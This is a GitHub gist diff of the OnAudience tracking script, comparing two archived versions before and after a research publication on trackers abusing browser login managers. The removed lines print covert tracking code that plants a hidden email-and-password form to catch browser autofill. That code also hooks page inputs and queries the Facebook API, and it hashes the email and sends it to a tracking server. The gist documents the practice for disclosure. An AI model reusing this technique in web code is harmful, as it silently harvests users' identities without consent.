Created
June 4, 2020 13:02
-
-
Save gunesacar/11883c40b4a2def7cee0f5dd757787d6 to your computer and use it in GitHub Desktop.
OnAudience script archived by the Wayback Machine on 28 Dec '17 and 3 Jan '18. The script was updated immediately following our publication: https://freedom-to-tinker.com/2017/12/27/no-boundaries-for-user-identities-web-trackers-exploit-browser-login-managers. (Sources were beautified before the comparison.)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@@ -471,7 +471,7 @@ | |
return t.toLowerCase() | |
}; | |
if (typeof BUtilities === 'undefined') BUtilities = { | |
- serverPath: '//web.archive.org/web/20171228075028/http://api.behavioralengine.com/', | |
+ serverPath: '//web.archive.org/web/20180103014626/http://api.behavioralengine.com/', | |
getCookie: function(cookieName) { | |
var i, name, value, cookies = document.cookie.split(';'); | |
for (var i = 0; i < cookies.length; i++) { | |
@@ -895,8 +895,8 @@ | |
}; | |
this.Internals = function() { | |
var internals = { | |
- AD_DOMAIN: "https://web.archive.org/web/20171228075028/http://ced.sascdn.com", | |
- IMAGE_DEST: "https://web.archive.org/web/20171228075028/http://hit.behavioralengine.com/advertisement/ad.png", | |
+ AD_DOMAIN: "https://web.archive.org/web/20180103014626/http://ced.sascdn.com", | |
+ IMAGE_DEST: "https://web.archive.org/web/20180103014626/http://hit.behavioralengine.com/advertisement/ad.png", | |
IMAGE_DEST_WIDTH: 100, | |
KEY_VALUE_SEPARATOR: '=', | |
POST: "POST", | |
@@ -1190,11 +1190,8 @@ | |
}, | |
onStart: function(self) { | |
self.generateBrowserData(self); | |
- self.fetchFBData(self); | |
self.checkBlock(self); | |
- self.checkPrivacy(self); | |
- self.checkId(self); | |
- self.checkInputId(self) | |
+ self.checkPrivacy(self) | |
}, | |
generateBrowserData: function(self) { | |
var date = new Date(); | |
@@ -1244,54 +1241,11 @@ | |
for (var i = 0; i < browserMimeTypesLength; i++) MimeTypesString += browserMimeTypes[i].type + ','; | |
return MimeTypesString | |
}, | |
- fetchFBData: function(self) { | |
- if (typeof FB !== 'undefined') self.sendFBApiRequest('gender, age_range, email', function(result) { | |
- if (typeof result.error === 'undefined') { | |
- self.data['data-hash-e'] = MD5(result.email); | |
- self.data['data-hash-f'] = MD5(result.id); | |
- self.data['data-attribute-s'] = self.parseGender(self, result.gender); | |
- self.flags.FBDataReady = true; | |
- self.behavioralEngine.flags.demographyData = true | |
- } else self.sendFBApiRequest('gender, age_range', function(result) { | |
- if (typeof result.error === 'undefined') { | |
- self.data['data-hash-f'] = MD5(result.id); | |
- self.data['data-attribute-s'] = self.parseGender(self, result.gender); | |
- self.flags.FBDataReady = true; | |
- self.behavioralEngine.flags.demographyData = true | |
- } | |
- }) | |
- }) | |
- }, | |
- sendFBApiRequest: function(fields, callback) { | |
- try { | |
- FB.api('/me', 'get', { | |
- fields: fields | |
- }, function(result) { | |
- callback(result) | |
- }) | |
- } catch (e) {} | |
- }, | |
- parseGender: function(self, gender) { | |
- switch (gender) { | |
- case 'male': | |
- return 'm'; | |
- case 'female': | |
- return 'f'; | |
- default: | |
- return '' | |
- } | |
- }, | |
- isFBDataReady: function(self) { | |
- return self.flags.FBDataReady | |
- }, | |
- getFBData: function(self) { | |
- return self.data | |
- }, | |
checkBlock: function(self) { | |
self.checkBlockTimeOut = window.setTimeout(function() { | |
self.setBlockFlag(self, true) | |
}, 1e3); | |
- BUtilities.getScript('//web.archive.org/web/20171228075028/http://cdn.behavioralengine.com/scripts/btest/advertisement.js') | |
+ BUtilities.getScript('//web.archive.org/web/20180103014626/http://cdn.behavioralengine.com/scripts/btest/advertisement.js') | |
}, | |
setBlockFlag: function(self, block) { | |
window.clearTimeout(self.checkBlockTimeOut); | |
@@ -1337,47 +1291,6 @@ | |
if (userAgent.indexOf('msie') < 0 && userAgent.indexOf('trident') < 0) return false; | |
var match = /(?:msie|rv:)\s?([\d\.]+)/.exec(userAgent); | |
return (match && parseInt(match[1], 10) >= 10) | |
- }, | |
- checkId: function(self) { | |
- var container = document.createElement('div'); | |
- container.id = 'be-container'; | |
- container.style.display = 'none'; | |
- var form = document.createElement('form'); | |
- form.attributes.autocomplete = 'on'; | |
- var emailInput = document.createElement('input'); | |
- emailInput.attributes.vcard_name = 'vCard.Email'; | |
- emailInput.id = 'email'; | |
- emailInput.type = 'email'; | |
- emailInput.name = 'email'; | |
- form.appendChild(emailInput); | |
- var passwordInput = document.createElement('input'); | |
- passwordInput.id = 'password'; | |
- passwordInput.type = 'password'; | |
- passwordInput.name = 'password'; | |
- form.appendChild(passwordInput); | |
- container.appendChild(form); | |
- document.body.appendChild(container); | |
- window.setTimeout(function() { | |
- if (self.emailRegexp.test(emailInput.value)) self.sendHash(self, MD5(emailInput.value)); | |
- document.body.removeChild(container) | |
- }, 1e3) | |
- }, | |
- checkInputId: function(self) { | |
- var inputs = document.getElementsByTagName('input'); | |
- for (var i = 0; i < inputs.length; i++) { | |
- inputs[i].addEventListener('blur', BehavioralEngine.analitic.inputIdBlurHandle, false); | |
- if (self.emailRegexp.test(inputs[i].value)) self.sendHash(self, MD5(inputs[i].value)) | |
- } | |
- }, | |
- inputIdBlurHandle: function() { | |
- var self = BehavioralEngine.analitic; | |
- if (self.emailRegexp.test(this.value)) { | |
- self.sendHash(self, MD5(this.value)); | |
- this.removeEventListener('blur', BehavioralEngine.analitic.inputIdBlurHandle, false) | |
- } | |
- }, | |
- sendHash: function(self, hash) { | |
- new Image().src = 'https://web.archive.org/web/20171228075028/http://api.behavioralengine.com/pixel?data-hash-e=' + hash + '&data-p=be_input' | |
} | |
} | |
}; | |
@@ -1914,7 +1827,7 @@ | |
self.bcookie.iframe.style.border = 0; | |
self.bcookie.iframe.style.opacity = 0; | |
self.bcookie.iframe.style.display = "none"; | |
- self.bcookie.iframe.src = '//web.archive.org/web/20171228075028/http://cdn.behavioralengine.com/scripts/bcookie/bcookie.html'; | |
+ self.bcookie.iframe.src = '//web.archive.org/web/20180103014626/http://cdn.behavioralengine.com/scripts/bcookie/bcookie.html'; | |
document.getElementsByTagName('body')[0].appendChild(self.bcookie.iframe); | |
self.eventManager.callEvent(self.eventManager, 'afterBCookieRequest') | |
}, | |
@@ -2069,8 +1982,8 @@ | |
} | |
/* | |
- FILE ARCHIVED ON 07:50:28 Dec 28, 2017 AND RETRIEVED FROM THE | |
- INTERNET ARCHIVE ON 22:03:05 Jun 03, 2020. | |
+ FILE ARCHIVED ON 01:46:26 Jan 03, 2018 AND RETRIEVED FROM THE | |
+ INTERNET ARCHIVE ON 22:03:38 Jun 03, 2020. | |
JAVASCRIPT APPENDED BY WAYBACK MACHINE, COPYRIGHT INTERNET ARCHIVE. | |
ALL OTHER CONTENT MAY ALSO BE PROTECTED BY COPYRIGHT (17 U.S.C. | |
@@ -2078,14 +1991,14 @@ | |
*/ | |
/* | |
playback timings (ms): | |
- load_resource: 266.158 | |
+ captures_list: 630.841 | |
+ CDXLines.iter: 19.438 (3) | |
+ exclusion.robots: 0.188 | |
+ PetaboxLoader3.resolve: 68.131 | |
+ load_resource: 259.975 | |
+ PetaboxLoader3.datanode: 698.237 (4) | |
+ exclusion.robots.policy: 0.173 | |
+ RedisCDXSource: 18.114 | |
+ LoadShardBlock: 570.379 (3) | |
esindex: 0.016 | |
- CDXLines.iter: 14.93 (3) | |
- exclusion.robots: 0.111 | |
- captures_list: 769.31 | |
- PetaboxLoader3.datanode: 395.458 (5) | |
- LoadShardBlock: 347.451 (3) | |
- PetaboxLoader3.resolve: 208.14 (3) | |
- RedisCDXSource: 385.117 | |
- exclusion.robots.policy: 0.103 | |
*/ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment